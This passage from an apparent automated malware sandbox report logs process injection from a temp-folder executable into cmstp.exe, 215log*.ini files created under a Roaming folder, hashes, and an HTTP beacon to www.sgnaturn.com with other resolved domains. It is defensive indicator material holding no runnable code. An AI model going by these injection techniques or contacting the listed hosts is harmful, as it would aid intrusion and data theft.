| private_0x00000000053a0000 | 0x053a0000 | 0x0541ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000054c0000 | 0x054c0000 | 0x0553ffff | Private Memory | rw |
|
|
|
- |
| imageres.dll | 0x055c0000 | 0x06914fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000006930000 | 0x06930000 | 0x069affff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x069b0000 | 0x06a6ffff | Memory Mapped File | rw |
|
|
|
- |
|
For performance reasons, the remaining 249 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\temp\jstchv.exe | 0x2b0 | address = 0x29a0000, size = 1167360 |
|
1 | |
| Modify Control Flow | #14: c:\users\aetadzjz\appdata\local\temp\jstchv.exe | 0x2b0 | os_tid = 0x3a0, address = 0x0 |
|
1 | |
| Modify Control Flow | #14: c:\users\aetadzjz\appdata\local\temp\jstchv.exe | 0x2b0 | os_tid = 0x3a0, address = 0x2a202b9 |
|
1 | |
| Modify Memory | #22: c:\windows\syswow64\cmstp.exe | 0xb0 | address = 0x45b0000, size = 770048 |
|
1 | |
| Modify Control Flow | #22: c:\windows\syswow64\cmstp.exe | 0xb0 | os_tid = 0x3a0, address = 0x0 |
|
1 | |
| Modify Control Flow | #22: c:\windows\syswow64\cmstp.exe | 0xb0 | os_tid = 0x3a0, address = 0x45e62a2 |
|
1 |
Host Behavior
File (33)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215log00.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logri.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrf.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrt.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrg.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrc.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrm.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logrv.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logro.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logcl.ini | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | \??\C:\Users\aETAdzjz\AppData\Roaming\2151P0RS\215logim.jpeg | desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\SysWOW64\cmstp.exe | os_pid = 0x9cc, creation_flags = CREATE_SUSPENDED, CREATE_DETACHED_PROCESS, CREATE_NO_WINDOW, show_window = SW_HIDE |
|
1 |
System (26)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 2000 milliseconds (2.000 seconds) |
|
25 | |
| Sleep | duration = 500 milliseconds (0.500 seconds) |
|
1 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = S-1-5-21-2345716-9241181358254 |
|
1 |
Network Behavior
DNS (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = www.maga.style, service = 80 |
|
1 | |
| Resolve Name | host = www.babyboomerrx.com, service = 80 |
|
1 | |
| Resolve Name | host = www.sgnaturn.com, address_out = 198.54.121.5, service = 80 |
|
1 |
TCP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 170 bytes |
| Total Data Received | 501 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 198.54.121.5:80 |
TCP Session #1
| Information | Value |
|---|---|
| Handle | 0x578 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 198.54.121.5 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49215 |
| Data Sent | 170 bytes |
| Data Received | 501 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 198.54.121.5, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 170, size_out = 170 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2048000, size_out = 501 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2047499, size_out = 0 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 170 bytes |
| Total Data Received | 501 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | www.sgnaturn.com |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | www.sgnaturn.com |
| Server Port | 80 |
| Data Sent | 170 |
| Data Received | 501 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = www.sgnaturn.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /al/?Kp2L=6gVvmFPDoiNbAIhnhTeuXmZIQvIKuazDxjJR9H5MhAeFNhXp9sPapi0HkLC6+HTKwqelpMhjL3Y=&fbc8=EFQdiN_822M |
|
1 | |
| Send HTTP Request | headers = host: www.sgnaturn.com, connection: close, url = www.sgnaturn.com/al/?Kp2L=6gVvmFPDoiNbAIhnhTeuXmZIQvIKuazDxjJR9H5MhAeFNhXp9sPapi0HkLC6+HTKwqelpMhjL3Y=&fbc8=EFQdiN_822M |
|
1 | |
| Read Response | size = 2048000, size_out = 501 |
|
1 | |
| Read Response | size = 2047499, size_out = 0 |
|
1 | |
| Close Session | - |
|
1 |
Process #22: cmstp.exe
398
0
| Information | Value |
|---|---|
| ID | #22 |
| File Name | c:\windows\syswow64\cmstp.exe |
| Command Line | "C:\Windows\SysWOW64\cmstp.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:50, Reason: Child Process |
| Unmonitor | End Time: 00:04:30, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:40 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9cc |
| Parent PID | 0x39c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B0
0x
34C
0x
8A0
0x
5F0
0x
330
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00031fff | Pagefile Backed Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00099fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| locale.nls | 0x000a0000 | 0x00106fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| cmstp.exe.mui | 0x00150000 | 0x00154fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x00160fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00170fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x001bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001e9fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00210fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0025ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x00289fff | Private Memory | rw |
|
|
|
- |
| oleaccrc.dll | 0x00290000 | 0x00290fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x002b0000 | 0x002b0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00341fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0042efff | Private Memory | rw |
|
|
|
- |
| index.dat | 0x00430000 | 0x0043bfff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0053ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x006c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x00850fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000860000 | 0x00860000 | 0x0099bfff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000860000 | 0x00860000 | 0x008f2fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x00992fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000009a0000 | 0x009a0000 | 0x00b20fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009a0000 | 0x009a0000 | 0x00b94fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ba0000 | 0x00ba0000 | 0x00c5bfff | Pagefile Backed Memory | rwx |
|
|
|
- |
| index.dat | 0x00ba0000 | 0x00ba7fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x00bb0000 | 0x00bbffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000bc0000 | 0x00bc0000 | 0x00bfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c00000 | 0x00c00000 | 0x00cdefff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ce0000 | 0x00ce0000 | 0x00d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ce0000 | 0x00ce0000 | 0x00ce0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cf0000 | 0x00cf0000 | 0x00cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d10000 | 0x00d10000 | 0x00d1ffff | Private Memory | rw |
|
|
|
- |
| cmstp.exe | 0x00d20000 | 0x00d37fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d20000 | 0x00d20000 | 0x00d37fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000d40000 | 0x00d40000 | 0x0213ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002140000 | 0x02140000 | 0x02442fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000002450000 | 0x02450000 | 0x02e13fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002e20000 | 0x02e20000 | 0x03014fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003030000 | 0x03030000 | 0x0306ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003070000 | 0x03070000 | 0x030affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030b0000 | 0x030b0000 | 0x030effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000030b0000 | 0x030b0000 | 0x030f3fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| private_0x00000000031a0000 | 0x031a0000 | 0x031dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000031e0000 | 0x031e0000 | 0x033d4fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000031e0000 | 0x031e0000 | 0x032dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032e0000 | 0x032e0000 | 0x0331ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000032e0000 | 0x032e0000 | 0x033e9fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| private_0x0000000003320000 | 0x03320000 | 0x0341ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000033e0000 | 0x033e0000 | 0x035effff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x035f0000 | 0x038befff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000038c0000 | 0x038c0000 | 0x03db1fff | Private Memory | rw |
|
|
|
- |
| ieframe.dll | 0x73370000 | 0x73deffff | Memory Mapped File | rwx |
|
|
|
- |
| nss3.dll | 0x75030000 | 0x751e4fff | Memory Mapped File | rwx |
|
|
|
- |
| windowscodecs.dll | 0x750f0000 | 0x751eafff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| gdiplus.dll | 0x75360000 | 0x754effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr100.dll | 0x75430000 | 0x754eefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x754f0000 | 0x7568dfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x75690000 | 0x75698fff | Memory Mapped File | rwx |
|
|
|
- |
| wsock32.dll | 0x756c0000 | 0x756c6fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x756d0000 | 0x756dafff | Memory Mapped File | rwx |
|
|
|
- |
| mlang.dll | 0x756e0000 | 0x7570dfff | Memory Mapped File | rwx |
|
|
|
- |
| oleacc.dll | 0x75710000 | 0x7574bfff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x75710000 | 0x75741fff | Memory Mapped File | rwx |
|
|
|
- |
| vaultcli.dll | 0x75740000 | 0x7574bfff | Memory Mapped File | rwx |
|
|
|
- |
| cmutil.dll | 0x75950000 | 0x7595dfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75ac0000 | 0x75bf5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x75f90000 | 0x75f94fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76330000 | 0x7644cfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76450000 | 0x76484fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x767e0000 | 0x769dafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77800000 | 0x7780bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77920000 | 0x77a14fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77df0000 | 0x77df5fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\temp\jstchv.exe | 0x2b0 | address = 0x70000, size = 172032 |
|
1 | |
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\temp\jstchv.exe | 0x2b0 | address = 0xd20000, size = 98304 |
|
1 |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\roaming\2151p0rs\215logrc.ini | 0.17 KB |
MD5:
6873155caa52cd7736bffbc7f1fd1f63
SHA1: a3521db044647faeab97c8d4085623cbced5da76 SHA256: 456669931f13e51c22cf643eba6b05c345bd8497d780fa367f3a12012579aee0 SSDeep: 3:MrKTleGQJhIQljlVgHlWvRS9lVfr8lilIXKlNlsTGkfovHiFqlEzShl:YKsGQPdEFWcHKzu8ykovjp |
|
|
| c:\users\aetadzjz\appdata\roaming\2151p0rs\215logrc.ini | 0.15 KB |
MD5:
6a2d8fd600948cefea9c615af9607bd5
SHA1: c0905d8beea8bd1f6f7d93f2f06accfdbf1bb926 SHA256: 8a8a84891ecb2032320d1c0de99fdcd94100df10f352d9f96fd1b2433cd4d45b SSDeep: 3:MrKTleGQJhIQljlVgHlWvRS9lVfr8lilIXKlNlsTGkfovHiFqlEA:YKsGQPdEFWcHKzu8ykovjh |
|
|
| c:\users\aetadzjz\appdata\roaming\2151p0rs\215logrc.ini | 0.21 KB |
MD5:
2ce3b57d9a11d645ec4163b8650af487
SHA1: cd02a6cc796d0245c2cf4450f7bdda47b9da5544 SHA256: 3c7ae802bb603f76eecfdbe5a22db5275af9d6d4dfb4cc3cca7fafaca705d10f SSDeep: 3:MrKTleGQJhIQljlVgHlWvRS9lVfr8lilIXKlNlsTGkfovHiFqlEzSht/g7AWn:YKsGQPdEFWcHKzu8ykovjtWn |
|
|
| c:\users\aetadzjz\appdata\roaming\2151p0rs\215logrc.ini | 0.91 KB |
MD5:
ff6641a98ab98ffc5c588e47fa0f35ad
SHA1: 9481e0f85d594c65dea3c9652976f5482cddd5a9 SHA256: 93ee08658b54f1569748c51b99fe2efdd5f14f6eab53feef4e16d9af14b69375 SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROVARBuwWm:bd5y3hW995S1Wm |
|
|
| c:\users\aetadzjz\appdata\roaming\2151p0rs\215logrc.ini | 1.62 KB |
MD5:
997b35447344bdff95a09b97835c3d4e
SHA1: fa6412396520eb483abec4bd5aa986cd9c832b06 SHA256: 5c597c9b3fc929baf3529349bf4aca235196ed81f9ab66a6d85ef5f2d48dc1f0 SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROVARBuwWSSwalYIgXP7b50d8aTd7gSX74:bd5y3hW995S1WhT2GdQT |
|
|
| c:\users\aetadzjz\appdata\roaming\2151p0rs\215logrc.ini | 0.19 KB |
MD5:
7c6603f907d0e1a9071aa4e5b5a2f0c1
SHA1: 4bef59206d0a40451e9b532f53d04b06ca5416d0 SHA256: a75aa51baa25fe222e6dd10429bc56427fec4646768877bdc2fbb0ab6c4b5128 SSDeep: 3:MrKTleGQJhIQljlVgHlWvRS9lVfr8lilIXKlNlsTGkfovHiFqlEzSht/g7A:YKsGQPdEFWcHKzu8ykovjd |
|
|
| c:\users\aetadzjz\appdata\roaming\2151p0rs\215logrv.ini | 0.04 KB |
MD5:
ba3b6bc807d4f76794c4b81b09bb9ba5
SHA1: 24cb89501f0212ff3095ecc0aba97dd563718fb1 SHA256: 6eebf968962745b2e9de2ca969af7c424916d4e3fe3cc0bb9b3d414abfce9507 SSDeep: 3:AJlbeGQJhIl:tGQPY |
|
|
| c:\users\aetadzjz\appdata\roaming\2151p0rs\215logrc.ini | 0.51 KB |
MD5:
97bf533aa4441f79a7e3da57592a8d65
SHA1: f73d796ec249b3ad6632ee6c9ad066d355e6f781 SHA256: ee83bd3c6da050681bbab83da96830b2760a60b8ed567e7fc4d0749c4436bb6b SSDeep: 12:YMFDKzu8jGhWCaYkH+g60QaaUlGx7bkWsFWqzu8jGn:YUd8acokH+gUca7b50WJ8an |
|
|
| c:\users\aetadzjz\appdata\roaming\2151p0rs\215logrc.ini | 0.72 KB |
MD5:
204e1caa52bfe8e225f18f4b7cb2c301
SHA1: c250c16a51cfb7c6406428086cfd10f498c25b14 SHA256: 08c4ce677ac7e98143ef3ad6adcaf1d9923c2623c5c8ba78902770373b655129 SSDeep: 12:YMFDKzu8jGhWCaYkH+g60QaaUlGx7bkWsFWqzu8jGkaa9li2aLSRw5k02lWWZ:YUd8acokH+gUca7b50WJ8akXZC5k04RZ |
|
|
| c:\users\aetadzjz\appdata\roaming\2151p0rs\215logrc.ini | 0.57 KB |
MD5:
677a3262f0fd5331646ac8ed78cee49e
SHA1: 8bfb56032a277b6733c2926d0e14bc31cc8df620 SHA256: 1d9aeadf89d9e4282de8fcabd484878de67195e899a337ae203ac55878911cb8 SSDeep: 12:YMFDKzu8jGhWCaYkH+g60QaaUlGx7bkWsFWqzu8jGkaaC:YUd8acokH+gUca7b50WJ8akq |
|
|
| c:\users\aetadzjz\appdata\roaming\2151p0rs\215logrc.ini | 1.41 KB |
MD5:
5cfaebc60a6f117672b95cd94d55399b
SHA1: 90dab2e2184c170ff26f22c04087c63fdb9cdc48 SHA256: 918fae13feee59e1ac67eda919b389fe7302add0380807fa50e00db6d0c7f372 SSDeep: 24:YUd8acokH+gUca7b50WJ8akXZC5k04ROVARBuwWSSwalYIgXP7b50d8am:bd5y3hW995S1WhT2GdI |
|
|
| c:\users\aetadzjz\appdata\roaming\2151p0rs\215logri.ini | 0.04 KB |
MD5:
d63a82e5d81e02e399090af26db0b9cb
SHA1: 91d0014c8f54743bba141fd60c9d963f869d76c9 SHA256: eaece2eba6310253249603033c744dd5914089b0bb26bde6685ec9813611baae SSDeep: 3:+slXllAGQJhIl:dlIGQPY |
|
|
| c:\users\aetadzjz\appdata\roaming\2151p0rs\215logrc.ini | 0.67 KB |
MD5:
8456e8cd47041d5317cf7ef3c90357a4
